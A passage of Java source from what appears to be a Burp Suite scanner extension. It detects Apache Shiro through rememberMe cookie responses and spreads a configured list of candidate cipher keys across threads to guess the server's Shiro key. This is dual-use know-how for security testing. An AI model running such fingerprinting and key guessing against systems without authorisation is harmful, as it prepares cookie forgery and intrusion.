129 | this.globalVariableReader,
130 | this.globalPassiveScanVariableReader,
131 | this.callbacks,
132 | this.yamlReader,
133 | this.baseRequestResponse,
134 | this.shiroFingerprint,
135 | this.payloadList,
136 | new GcmEncrypt(),
137 | this.startDate,
138 | this.getMaxExecutionTime());
139 |
140 | if (shiroCipherKey2.isShiroCipherKeyExists()) {
141 | this.globalPassiveScanVariableReader.putBooleanData("isEndShiroCipherKeyTask", true);
142 | this.globalPassiveScanVariableReader.putShiroCipherKeyExtensionData("shiroCipherKey", shiroCipherKey2);
143 | }
144 | }
145 | } catch (ClassNotFoundException | NoSuchMethodException | InstantiationException | IllegalAccessException | InvocationTargetException e) {
146 | e.printStackTrace(new PrintWriter(this.callbacks.getStderr(), true));
147 | }
148 | }
149 |
150 | /**
151 | * 程序最大执行时间,单位为秒
152 | * 会根据payload的添加而添加
153 | *
154 | * @return
155 | */
156 | private Integer getMaxExecutionTime() {
157 | Integer maxExecutionTime = this.maxExecutionTime;
158 | maxExecutionTime += this.payloadList.size() * 6;
159 | return maxExecutionTime;
160 | }
161 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroCipherKeyExtension/ShiroCipherKeyThread.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroCipherKeyExtension;
2 |
3 | import java.util.List;
4 | import java.util.ArrayList;
5 |
6 | import burp.IHttpRequestResponse;
7 | import burp.IBurpExtenderCallbacks;
8 |
9 | import burp.Bootstrap.YamlReader;
10 | import burp.Bootstrap.CustomHelpers;
11 | import burp.Bootstrap.GlobalVariableReader;
12 | import burp.Bootstrap.GlobalPassiveScanVariableReader;
13 |
14 | import burp.Application.ShiroFingerprintExtension.ShiroFingerprint;
15 |
16 | public class ShiroCipherKeyThread {
17 | private List threadPool = new ArrayList<>();
18 |
19 | public ShiroCipherKeyThread(GlobalVariableReader globalVariableReader,
20 | GlobalPassiveScanVariableReader globalPassiveScanVariableReader,
21 | IBurpExtenderCallbacks callbacks,
22 | YamlReader yamlReader,
23 | IHttpRequestResponse baseRequestResponse,
24 | ShiroFingerprint shiroFingerprint,
25 | String callClassName) {
26 | // 是否结束shiro加密key扩展任务
27 | // 用于多线程,跑到key,把程序快速退出去,避免资源浪费与卡顿
28 | // true = 结束, false = 不结束
29 | globalPassiveScanVariableReader.putBooleanData("isEndShiroCipherKeyTask", false);
30 |
31 | if (callClassName == null || callClassName.length() <= 0) {
32 | throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-请输入要调用的插件名称");
33 | }
34 |
35 | List payloads = yamlReader.getStringList("application.shiroCipherKeyExtension.config.payloads");
36 | if (payloads.size() == 0) {
37 | throw new IllegalArgumentException("Application.ShiroCipherKeyExtension-获取的payloads为空,无法正常运行");
38 | }
39 |
40 | // payload按照配置线程数分块
41 | Integer shiroCipherKeyThreadTotal = yamlReader.getInteger("application.shiroCipherKeyExtension.config.threadTotal");
42 | List> payloadChunk = CustomHelpers.listChunkSplit(payloads, shiroCipherKeyThreadTotal);
43 |
44 | // 建立线程池
45 | for (List payloadList : payloadChunk) {
46 | this.threadPool.add(new Thread(
47 | new ShiroCipherKey(
48 | globalVariableReader, globalPassiveScanVariableReader, callbacks,
49 | yamlReader, baseRequestResponse, shiroFingerprint,
50 | callClassName, payloadList)
51 | ));
52 | }
53 |
54 | // 线程启动
55 | for (int i = 0; i < this.threadPool.size(); i++) {
56 | this.threadPool.get(i).start();
57 | }
58 | }
59 |
60 | /**
61 | * 判断线程任务是否执行完毕
62 | *
63 | * @return
64 | */
65 | public Boolean isTaskComplete() {
66 | // 开启的线程总数
67 | Integer threadCcount = this.threadPool.size();
68 |
69 | // 线程完成数量
70 | Integer threadNum = 0;
71 |
72 | for (Thread t : this.threadPool) {
73 | if (!t.isAlive()) {
74 | threadNum++;
75 | }
76 | }
77 |
78 | if (threadNum.equals(threadCcount)) {
79 | return true;
80 | }
81 |
82 | return false;
83 | }
84 | }
85 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionInterface/AShiroFingerprintExtension.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroFingerprintExtension.ExtensionInterface;
2 |
3 | import burp.IHttpRequestResponse;
4 |
5 | /**
6 | * shiro指纹扩展的抽象类
7 | * 所有的shiro指纹检测的方法都要继承它并实现所有的接口
8 | */
9 | public abstract class AShiroFingerprintExtension implements IShiroFingerprintExtension {
10 | private String extensionName = "";
11 |
12 | private Boolean isRunExtension = false;
13 |
14 | private Boolean isShiroFingerprint = false;
15 |
16 | private String requestRememberMeCookieName = "";
17 | private String requestRememberMeCookieValue = "";
18 |
19 | private String responseRememberMeCookieName = "";
20 | private String responseRememberMeCookieValue = "";
21 |
22 | private IHttpRequestResponse newHttpRequestResponse;
23 |
24 | /**
25 | * 设置扩展名称 (必须的)
26 | *
27 | * @param value
28 | */
29 | protected void setExtensionName(String value) {
30 | if (value == null || value.isEmpty()) {
31 | throw new IllegalArgumentException("shiro指纹扫描扩展-扩展名称不能为空");
32 | }
33 | this.extensionName = value;
34 | }
35 |
36 | /**
37 | * 扩展名称检查
38 | * 作用: 让所有不设置扩展名称的扩展无法正常使用, 防止直接调用本类的其他方法, 保证扩展的正常
39 | */
40 | private void extensionNameCheck() {
41 | if (this.extensionName == null || this.extensionName.isEmpty()) {
42 | throw new IllegalArgumentException("请为该shiro指纹扫描扩展-设置扩展名称");
43 | }
44 | }
45 |
46 | /**
47 | * 获取扩展名称
48 | *
49 | * @return String
50 | */
51 | @Override
52 | public String getExtensionName() {
53 | this.extensionNameCheck();
54 | return this.extensionName;
55 | }
56 |
57 | /**
58 | * 注册插件 (必须的)
59 | * 扩展在运行之前必须调用该接口注册, 否则将无法调用本类的其他方法
60 | */
61 | protected void registerExtension() {
62 | this.extensionNameCheck();
63 | this.isRunExtension = true;
64 | }
65 |
66 | /**
67 | * 注册扩展检查
68 | * 作用: 让所有未调用方法 registerExtension() 的接口, 无法使用本类的其他方法, 保证扩展的正常
69 | */
70 | private void registerExtensionCheck() {
71 | if (!this.isRunExtension) {
72 | throw new IllegalArgumentException("注意: 该指纹模块未注册,无法使用");
73 | }
74 | }
75 |
76 | /**
77 | * 是否运行扩展
78 | * true 运行
79 | * false 不运行
80 | *
81 | * @return Boolean
82 | */
83 | @Override
84 | public Boolean isRunExtension() {
85 | return this.isRunExtension;
86 | }
87 |
88 | /**
89 | * 设置为shiro指纹
90 | */
91 | protected void setShiroFingerprint() {
92 | this.registerExtensionCheck();
93 | this.isShiroFingerprint = true;
94 | }
95 |
96 | /**
97 | * 是否shiro框架
98 | *
99 | * @return Boolean
100 | */
101 | @Override
102 | public Boolean isShiroFingerprint() {
103 | this.registerExtensionCheck();
104 | return this.isShiroFingerprint;
105 | }
106 |
107 | /**
108 | * 设置请求默认“记住我”的Cookie名
109 | *
110 | * @param value
111 | */
112 | protected void setRequestDefaultRememberMeCookieName(String value) {
113 | this.registerExtensionCheck();
114 | this.requestRememberMeCookieName = value;
115 | }
116 |
117 | /**
118 | * 获取请求默认“记住我”的Cookie名
119 | *
120 | * @return String
121 | */
122 | @Override
123 | public String getRequestDefaultRememberMeCookieName() {
124 | this.registerExtensionCheck();
125 | return this.requestRememberMeCookieName;
126 | }
127 |
128 | /**
129 | * 设置请求默认“记住我”的Cookie值
130 | *
131 | * @param value
132 | */
133 | protected void setRequestDefaultRememberMeCookieValue(String value) {
134 | this.registerExtensionCheck();
135 | this.requestRememberMeCookieValue = value;
136 | }
137 |
138 | /**
139 | * 获取请求默认“记住我”的Cookie值
140 | *
141 | * @return String
142 | */
143 | @Override
144 | public String getRequestDefaultRememberMeCookieValue() {
145 | this.registerExtensionCheck();
146 | return this.requestRememberMeCookieValue;
147 | }
148 |
149 | /**
150 | * 设置响应默认“记住我”的Cookie名称
151 | *
152 | * @param value
153 | */
154 | protected void setResponseDefaultRememberMeCookieName(String value) {
155 | this.registerExtensionCheck();
156 | this.responseRememberMeCookieName = value;
157 | }
158 |
159 | /**
160 | * 获取响应默认“记住我”的Cookie名称
161 | *
162 | * @return String
163 | */
164 | @Override
165 | public String getResponseDefaultRememberMeCookieName() {
166 | this.registerExtensionCheck();
167 | return this.responseRememberMeCookieName;
168 | }
169 |
170 | /**
171 | * 设置响应默认的“记住我”Cookie值
172 | *
173 | * @param value
174 | */
175 | protected void setResponseDefaultRememberMeCookieValue(String value) {
176 | this.registerExtensionCheck();
177 | this.responseRememberMeCookieValue = value;
178 | }
179 |
180 | /**
181 | * 获取设置响应默认的“记住我”Cookie值
182 | *
183 | * @return
184 | */
185 | @Override
186 | public String getResponseDefaultRememberMeCookieValue() {
187 | this.registerExtensionCheck();
188 | return this.responseRememberMeCookieValue;
189 | }
190 |
191 | /**
192 | * 设置http请求与响应对象
193 | *
194 | * @param httpRequestResponse
195 | */
196 | protected void setHttpRequestResponse(IHttpRequestResponse httpRequestResponse) {
197 | this.registerExtensionCheck();
198 | this.newHttpRequestResponse = httpRequestResponse;
199 | }
200 |
201 | /**
202 | * 获取http请求与响应对象
203 | *
204 | * @return IHttpRequestResponse
205 | */
206 | @Override
207 | public IHttpRequestResponse getHttpRequestResponse() {
208 | this.registerExtensionCheck();
209 | return this.newHttpRequestResponse;
210 | }
211 | }
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionInterface/IShiroFingerprintExtension.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroFingerprintExtension.ExtensionInterface;
2 |
3 | import burp.IScanIssue;
4 | import burp.IHttpRequestResponse;
5 |
6 | /**
7 | * shiro指纹扩展的公共接口
8 | * 所有的抽象类都要继承它并实现所有的接口
9 | */
10 | public interface IShiroFingerprintExtension {
11 | String getExtensionName();
12 |
13 | Boolean isRunExtension();
14 |
15 | Boolean isShiroFingerprint();
16 |
17 | String getRequestDefaultRememberMeCookieName();
18 |
19 | String getRequestDefaultRememberMeCookieValue();
20 |
21 | String getResponseDefaultRememberMeCookieName();
22 |
23 | String getResponseDefaultRememberMeCookieValue();
24 |
25 | IHttpRequestResponse getHttpRequestResponse();
26 |
27 | IScanIssue export();
28 |
29 | void consoleExport();
30 | }
31 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint1.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroFingerprintExtension.ExtensionMethod;
2 |
3 | import burp.*;
4 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.AShiroFingerprintExtension;
5 | import burp.Bootstrap.YamlReader;
6 |
7 | import java.io.PrintWriter;
8 | import java.net.URL;
9 |
10 | public class ShiroFingerprint1 extends AShiroFingerprintExtension {
11 | private IBurpExtenderCallbacks callbacks;
12 | private IExtensionHelpers helpers;
13 |
14 | private YamlReader yamlReader;
15 |
16 | private IHttpRequestResponse baseRequestResponse;
17 |
18 | private String rememberMeCookieName = "rememberMe";
19 | private String rememberMeCookieValue = "1";
20 |
21 | public ShiroFingerprint1(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) {
22 | this.callbacks = callbacks;
23 | this.helpers = callbacks.getHelpers();
24 |
25 | this.yamlReader = yamlReader;
26 |
27 | this.baseRequestResponse = baseRequestResponse;
28 |
29 | this.setExtensionName("ShiroFingerprint1");
30 |
31 | this.runConditionCheck();
32 | }
33 |
34 | private void runConditionCheck() {
35 | this.registerExtension();
36 | }
37 |
38 | public void runExtension() {
39 | if (!this.isRunExtension()) {
40 | return;
41 | }
42 |
43 | IHttpService httpService = this.baseRequestResponse.getHttpService();
44 |
45 | IParameter newParameter = this.helpers.buildParameter(this.rememberMeCookieName, this.rememberMeCookieValue, (byte) 2);
46 | byte[] newRequest = this.helpers.updateParameter(this.baseRequestResponse.getRequest(), newParameter);
47 | IHttpRequestResponse newHttpRequestResponse = this.callbacks.makeHttpRequest(httpService, newRequest);
48 |
49 | this.setHttpRequestResponse(newHttpRequestResponse);
50 |
51 | for (ICookie c : this.helpers.analyzeResponse(newHttpRequestResponse.getResponse()).getCookies()) {
52 | if (c.getName().equals(this.rememberMeCookieName)) {
53 | this.setShiroFingerprint();
54 |
55 | this.setRequestDefaultRememberMeCookieName(this.rememberMeCookieName);
56 | this.setRequestDefaultRememberMeCookieValue(this.rememberMeCookieValue);
57 |
58 | this.setResponseDefaultRememberMeCookieName(c.getName());
59 | this.setResponseDefaultRememberMeCookieValue(c.getValue());
60 | break;
61 | }
62 | }
63 | }
64 |
65 | @Override
66 | public IScanIssue export() {
67 | if (!this.isRunExtension()) {
68 | return null;
69 | }
70 |
71 | if (!this.isShiroFingerprint()) {
72 | return null;
73 | }
74 |
75 | IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
76 | URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();
77 |
78 | String str1 = String.format("
============ShiroFingerprintDetail============
");
79 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName());
80 | String str3 = String.format("RequestCookiePayload: %s=%s
",
81 | this.getRequestDefaultRememberMeCookieName(),
82 | this.getRequestDefaultRememberMeCookieValue());
83 | String str4 = String.format("ResponseReturnCookie: %s=%s
",
84 | this.getResponseDefaultRememberMeCookieName(),
85 | this.getResponseDefaultRememberMeCookieValue());
86 | String str5 = String.format("=====================================
");
87 |
88 | String detail = str1 + str2 + str3 + str4 + str5;
89 |
90 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName");
91 |
92 | return new CustomScanIssue(
93 | newHttpRequestUrl,
94 | shiroFingerprintIssueName,
95 | 0,
96 | "Information",
97 | "Certain",
98 | null,
99 | null,
100 | detail,
101 | null,
102 | new IHttpRequestResponse[]{newHttpRequestResponse},
103 | newHttpRequestResponse.getHttpService()
104 | );
105 | }
106 |
107 | @Override
108 | public void consoleExport() {
109 | if (!this.isRunExtension()) {
110 | return;
111 | }
112 |
113 | if (!this.isShiroFingerprint()) {
114 | return;
115 | }
116 |
117 | IHttpRequestResponse newHttpRequestResponse = this.getHttpRequestResponse();
118 | URL newHttpRequestUrl = this.helpers.analyzeRequest(newHttpRequestResponse).getUrl();
119 | String newHttpRequestMethod = this.helpers.analyzeRequest(newHttpRequestResponse.getRequest()).getMethod();
120 | int newHttpResponseStatusCode = this.helpers.analyzeResponse(newHttpRequestResponse.getResponse()).getStatusCode();
121 |
122 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true);
123 |
124 | stdout.println("");
125 | stdout.println("==============shiro指纹详情============");
126 | stdout.println("你好呀~ (≧ω≦*)喵~");
127 | stdout.println("这边检测到有一个站点使用了 shiro框架 喵~");
128 | stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
129 | stdout.println(String.format("url: %s", newHttpRequestUrl));
130 | stdout.println(String.format("请求方法: %s", newHttpRequestMethod));
131 | stdout.println(String.format("页面http状态: %d", newHttpResponseStatusCode));
132 | stdout.println(String.format("请求对应的cookie: %s=%s",
133 | this.getRequestDefaultRememberMeCookieName(),
134 | this.getRequestDefaultRememberMeCookieValue()));
135 | stdout.println(String.format("响应返回的cookie: %s=%s",
136 | this.getResponseDefaultRememberMeCookieName(),
137 | this.getResponseDefaultRememberMeCookieValue()));
138 | stdout.println("详情请查看-Burp Scanner模块-Issue activity界面");
139 | stdout.println("===================================");
140 | stdout.println("");
141 | }
142 | }
143 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint2.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroFingerprintExtension.ExtensionMethod;
2 |
3 | import burp.*;
4 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.AShiroFingerprintExtension;
5 | import burp.Bootstrap.YamlReader;
6 |
7 | import java.io.PrintWriter;
8 | import java.net.URL;
9 |
10 | public class ShiroFingerprint2 extends AShiroFingerprintExtension {
11 | private IBurpExtenderCallbacks callbacks;
12 | private IExtensionHelpers helpers;
13 |
14 | private YamlReader yamlReader;
15 |
16 | private IHttpRequestResponse baseRequestResponse;
17 |
18 | private String rememberMeCookieValue = "2";
19 |
20 | public ShiroFingerprint2(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) {
21 | this.callbacks = callbacks;
22 | this.helpers = callbacks.getHelpers();
23 |
24 | this.yamlReader = yamlReader;
25 |
26 | this.baseRequestResponse = baseRequestResponse;
27 |
28 | this.setExtensionName("ShiroFingerprint2");
29 |
30 | this.runConditionCheck();
31 | }
32 |
33 | /**
34 | * 原始请求响应返回 cookie 的 value 带了 deleteMe 则进入该流程
35 | */
36 | private void runConditionCheck() {
37 | for (ICookie c : this.helpers.analyzeResponse(this.baseRequestResponse.getResponse()).getCookies()) {
38 | if (c.getValue().equals("deleteMe")) {
39 | this.registerExtension();
40 | break;
41 | }
42 | }
43 | }
44 |
45 | public void runExtension() {
46 | if (!this.isRunExtension()) {
47 | return;
48 | }
49 |
50 | // 先保存一个基础的请求响应
51 | this.setHttpRequestResponse(this.baseRequestResponse);
52 |
53 | for (ICookie c : this.helpers.analyzeResponse(this.baseRequestResponse.getResponse()).getCookies()) {
54 | if (c.getValue().equals("deleteMe")) {
55 | this.setShiroFingerprint();
56 |
57 | // 通过返回包的key重新构造一个请求发过去
58 | // 这样二次确认过的请求响应, 可以获得最真实的结果
59 | IHttpRequestResponse newHttpRequestResponse = this.getNewHttpRequestResponse(
60 | c.getName(),
61 | this.rememberMeCookieValue);
62 |
63 | // 二次确认的请求确定是shiro框架了
64 | // 保存这个最真实的结果, 覆盖上面那个基础的请求响应
65 | this.setHttpRequestResponse(newHttpRequestResponse);
66 |
67 | this.setRequestDefaultRememberMeCookieName(c.getName());
68 | this.setRequestDefaultRememberMeCookieValue(this.rememberMeCookieValue);
69 |
70 | this.setResponseDefaultRememberMeCookieName(c.getName());
71 | this.setResponseDefaultRememberMeCookieValue(c.getValue());
72 | break;
73 | }
74 | }
75 | }
76 |
77 | /**
78 | * 获取新的http请求响应
79 | *
80 | * @param rememberMeCookieName
81 | * @param rememberMeCookieValue
82 | * @return IHttpRequestResponse
83 | */
84 | private IHttpRequestResponse getNewHttpRequestResponse(String rememberMeCookieName, String rememberMeCookieValue) {
85 | IHttpService httpService = this.baseRequestResponse.getHttpService();
86 | IParameter newParameter = this.helpers.buildParameter(
87 | rememberMeCookieName,
88 | rememberMeCookieValue,
89 | (byte) 2);
90 | byte[] newRequest = this.helpers.updateParameter(this.baseRequestResponse.getRequest(), newParameter);
91 | IHttpRequestResponse newHttpRequestResponse = this.callbacks.makeHttpRequest(httpService, newRequest);
92 | return newHttpRequestResponse;
93 | }
94 |
95 | @Override
96 | public IScanIssue export() {
97 | if (!this.isRunExtension()) {
98 | return null;
99 | }
100 |
101 | if (!this.isShiroFingerprint()) {
102 | return null;
103 | }
104 |
105 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse();
106 | URL newHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl();
107 |
108 | String str1 = String.format("
============ShiroFingerprintDetail============
");
109 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName());
110 | String str3 = String.format("RequestCookiePayload: %s=%s
",
111 | this.getRequestDefaultRememberMeCookieName(),
112 | this.getRequestDefaultRememberMeCookieValue());
113 | String str4 = String.format("ResponseReturnCookie: %s=%s
",
114 | this.getResponseDefaultRememberMeCookieName(),
115 | this.getResponseDefaultRememberMeCookieValue());
116 | String str5 = String.format("=====================================
");
117 |
118 | String detail = str1 + str2 + str3 + str4 + str5;
119 |
120 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName");
121 |
122 | return new CustomScanIssue(
123 | newHttpRequestUrl,
124 | shiroFingerprintIssueName,
125 | 0,
126 | "Information",
127 | "Certain",
128 | null,
129 | null,
130 | detail,
131 | null,
132 | new IHttpRequestResponse[]{baseHttpRequestResponse},
133 | baseHttpRequestResponse.getHttpService()
134 | );
135 | }
136 |
137 | @Override
138 | public void consoleExport() {
139 | if (!this.isRunExtension()) {
140 | return;
141 | }
142 |
143 | if (!this.isShiroFingerprint()) {
144 | return;
145 | }
146 |
147 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse();
148 | URL baseHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl();
149 | String baseHttpRequestMethod = this.helpers.analyzeRequest(baseHttpRequestResponse.getRequest()).getMethod();
150 | int baseHttpResponseStatusCode = this.helpers.analyzeResponse(baseHttpRequestResponse.getResponse()).getStatusCode();
151 |
152 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true);
153 |
154 | stdout.println("");
155 | stdout.println("=============shiro指纹详情============");
156 | stdout.println("你好呀~ (≧ω≦*)喵~");
157 | stdout.println("这边检测到有一个站点使用了 shiro框架 喵~");
158 | stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
159 | stdout.println(String.format("url: %s", baseHttpRequestUrl));
160 | stdout.println(String.format("请求方法: %s", baseHttpRequestMethod));
161 | stdout.println(String.format("页面http状态: %d", baseHttpResponseStatusCode));
162 | stdout.println("注意: 原始请求响应返回了 shiro 关键字所以没有发送新请求");
163 | stdout.println(String.format("请求对应的cookie: %s=%s",
164 | this.getRequestDefaultRememberMeCookieName(),
165 | this.getRequestDefaultRememberMeCookieValue()));
166 | stdout.println(String.format("响应返回的cookie: %s=%s",
167 | this.getResponseDefaultRememberMeCookieName(),
168 | this.getResponseDefaultRememberMeCookieValue()));
169 | stdout.println("详情请查看-Burp Scanner模块-Issue activity界面");
170 | stdout.println("===================================");
171 | stdout.println("");
172 | }
173 | }
174 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroFingerprintExtension/ExtensionMethod/ShiroFingerprint3.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroFingerprintExtension.ExtensionMethod;
2 |
3 | import burp.*;
4 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.AShiroFingerprintExtension;
5 | import burp.Bootstrap.YamlReader;
6 |
7 | import java.io.PrintWriter;
8 | import java.net.URL;
9 |
10 | public class ShiroFingerprint3 extends AShiroFingerprintExtension {
11 | private IBurpExtenderCallbacks callbacks;
12 | private IExtensionHelpers helpers;
13 |
14 | private YamlReader yamlReader;
15 |
16 | private IHttpRequestResponse baseRequestResponse;
17 |
18 | private String rememberMeCookieName = "rememberMe";
19 | private String rememberMeCookieValue = "3";
20 |
21 | public ShiroFingerprint3(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) {
22 | this.callbacks = callbacks;
23 | this.helpers = callbacks.getHelpers();
24 |
25 | this.yamlReader = yamlReader;
26 |
27 | this.baseRequestResponse = baseRequestResponse;
28 |
29 | this.setExtensionName("ShiroFingerprint3");
30 |
31 | this.runConditionCheck();
32 | }
33 |
34 | /**
35 | * 原始请求 cookie 的 key 带了 rememberMe 则进入该流程
36 | */
37 | private void runConditionCheck() {
38 | for (IParameter p : this.helpers.analyzeRequest(this.baseRequestResponse.getRequest()).getParameters()) {
39 | if (p.getType() != 2) {
40 | continue;
41 | }
42 | if (!p.getName().equals(this.rememberMeCookieName)) {
43 | continue;
44 | }
45 | if (p.getValue() == null || p.getValue().length() <= 0) {
46 | continue;
47 | }
48 |
49 | for (ICookie c : this.helpers.analyzeResponse(this.baseRequestResponse.getResponse()).getCookies()) {
50 | if (c.getName().equals(this.rememberMeCookieName)) {
51 | if (c.getValue().equals("deleteMe")) {
52 | this.registerExtension();
53 | return;
54 | }
55 | }
56 | }
57 | }
58 | }
59 |
60 | public void runExtension() {
61 | if (!this.isRunExtension()) {
62 | return;
63 | }
64 |
65 | this.setHttpRequestResponse(this.baseRequestResponse);
66 |
67 | for (ICookie c : this.helpers.analyzeResponse(this.baseRequestResponse.getResponse()).getCookies()) {
68 | if (c.getName().equals(this.rememberMeCookieName)) {
69 | if (c.getValue().equals("deleteMe")) {
70 | this.setShiroFingerprint();
71 |
72 | this.setRequestDefaultRememberMeCookieName(this.rememberMeCookieName);
73 | this.setRequestDefaultRememberMeCookieValue(this.rememberMeCookieValue);
74 |
75 | this.setResponseDefaultRememberMeCookieName(c.getName());
76 | this.setResponseDefaultRememberMeCookieValue(c.getValue());
77 | break;
78 | }
79 | }
80 | }
81 | }
82 |
83 | @Override
84 | public IScanIssue export() {
85 | if (!this.isRunExtension()) {
86 | return null;
87 | }
88 |
89 | if (!this.isShiroFingerprint()) {
90 | return null;
91 | }
92 |
93 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse();
94 | URL newHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl();
95 |
96 | String str1 = String.format("
============ShiroFingerprintDetail============
");
97 | String str2 = String.format("ExtensionMethod: %s
", this.getExtensionName());
98 | String str3 = String.format("RequestCookiePayload: %s=%s
",
99 | this.getRequestDefaultRememberMeCookieName(),
100 | this.getRequestDefaultRememberMeCookieValue());
101 | String str4 = String.format("ResponseReturnCookie: %s=%s
",
102 | this.getResponseDefaultRememberMeCookieName(),
103 | this.getResponseDefaultRememberMeCookieValue());
104 | String str5 = String.format("=====================================
");
105 |
106 | String detail = str1 + str2 + str3 + str4 + str5;
107 |
108 | String shiroFingerprintIssueName = this.yamlReader.getString("application.shiroFingerprintExtension.config.issueName");
109 |
110 | return new CustomScanIssue(
111 | newHttpRequestUrl,
112 | shiroFingerprintIssueName,
113 | 0,
114 | "Information",
115 | "Certain",
116 | null,
117 | null,
118 | detail,
119 | null,
120 | new IHttpRequestResponse[]{baseHttpRequestResponse},
121 | baseHttpRequestResponse.getHttpService()
122 | );
123 | }
124 |
125 | @Override
126 | public void consoleExport() {
127 | if (!this.isRunExtension()) {
128 | return;
129 | }
130 |
131 | if (!this.isShiroFingerprint()) {
132 | return;
133 | }
134 |
135 | IHttpRequestResponse baseHttpRequestResponse = this.getHttpRequestResponse();
136 | URL baseHttpRequestUrl = this.helpers.analyzeRequest(baseHttpRequestResponse).getUrl();
137 | String baseHttpRequestMethod = this.helpers.analyzeRequest(baseHttpRequestResponse.getRequest()).getMethod();
138 | int baseHttpResponseStatusCode = this.helpers.analyzeResponse(baseHttpRequestResponse.getResponse()).getStatusCode();
139 |
140 | PrintWriter stdout = new PrintWriter(this.callbacks.getStdout(), true);
141 |
142 | stdout.println("");
143 | stdout.println("==============shiro指纹详情============");
144 | stdout.println("你好呀~ (≧ω≦*)喵~");
145 | stdout.println("这边检测到有一个站点使用了 shiro框架 喵~");
146 | stdout.println(String.format("负责检测的插件: %s", this.getExtensionName()));
147 | stdout.println(String.format("url: %s", baseHttpRequestUrl));
148 | stdout.println(String.format("请求方法: %s", baseHttpRequestMethod));
149 | stdout.println(String.format("页面http状态: %d", baseHttpResponseStatusCode));
150 | stdout.println("注意: 原始请求自己添加了 shiro 关键字所以没有发送新请求");
151 | stdout.println(String.format("请求对应的cookie: %s=%s",
152 | this.getRequestDefaultRememberMeCookieName(),
153 | this.getRequestDefaultRememberMeCookieValue()));
154 | stdout.println(String.format("响应返回的cookie: %s=%s",
155 | this.getResponseDefaultRememberMeCookieName(),
156 | this.getResponseDefaultRememberMeCookieValue()));
157 | stdout.println("详情请查看-Burp Scanner模块-Issue activity界面");
158 | stdout.println("===================================");
159 | stdout.println("");
160 | }
161 | }
162 |
--------------------------------------------------------------------------------
/src/main/java/burp/Application/ShiroFingerprintExtension/ShiroFingerprint.java:
--------------------------------------------------------------------------------
1 | package burp.Application.ShiroFingerprintExtension;
2 |
3 | import burp.IHttpRequestResponse;
4 | import burp.IBurpExtenderCallbacks;
5 |
6 | import burp.Bootstrap.YamlReader;
7 |
8 | import burp.Application.ShiroFingerprintExtension.ExtensionMethod.ShiroFingerprint1;
9 | import burp.Application.ShiroFingerprintExtension.ExtensionMethod.ShiroFingerprint2;
10 | import burp.Application.ShiroFingerprintExtension.ExtensionMethod.ShiroFingerprint3;
11 |
12 | import burp.Application.ShiroFingerprintExtension.ExtensionInterface.IShiroFingerprintExtension;
13 |
14 | public class ShiroFingerprint {
15 | private IBurpExtenderCallbacks callbacks;
16 |
17 | private YamlReader yamlReader;
18 |
19 | private IHttpRequestResponse baseRequestResponse;
20 |
21 | private IShiroFingerprintExtension shiroFingerprint;
22 |
23 | public ShiroFingerprint(IBurpExtenderCallbacks callbacks, YamlReader yamlReader, IHttpRequestResponse baseRequestResponse) {
24 | this.callbacks = callbacks;
25 |
26 | this.yamlReader = yamlReader;
27 |
28 | this.baseRequestResponse = baseRequestResponse;
29 |
30 | this.shiroFingerprint = setShiroFingerprint();
31 | }
32 |
33 | private IShiroFingerprintExtension setShiroFingerprint() {
34 | // 原始请求 cookie 的 key 带了 rememberMe 则进入该流程
35 | ShiroFingerprint3 shiroFingerprint3 = new ShiroFingerprint3(this.callbacks, this.yamlReader, this.baseRequestResponse);
36 | if (shiroFingerprint3.isRunExtension()) {
37 | shiroFingerprint3.runExtension();
38 | return shiroFingerprint3;
39 | }
40 |
41 | // 原始请求响应返回 cookie 的 value 带了 deleteMe 则进入该流程
42 | ShiroFingerprint2 shiroFingerprint2 = new ShiroFingerprint2(this.callbacks, this.yamlReader, this.baseRequestResponse);
43 | if (shiroFingerprint2.isRunExtension()) {
44 | shiroFingerprint2.runExtension();
45 | return shiroFingerprint2;
46 | }
47 |
48 | // 上面的条件都不满足时,进入该流程
49 | ShiroFingerprint1 shiroFingerprint1 = new ShiroFingerprint1(this.callbacks, this.yamlReader, this.baseRequestResponse);
50 | shiroFingerprint1.runExtension();
51 | return shiroFingerprint1;
52 | }
53 |
54 | public IShiroFingerprintExtension run() {
55 | return this.shiroFingerprint;
56 | }
57 | }
58 |
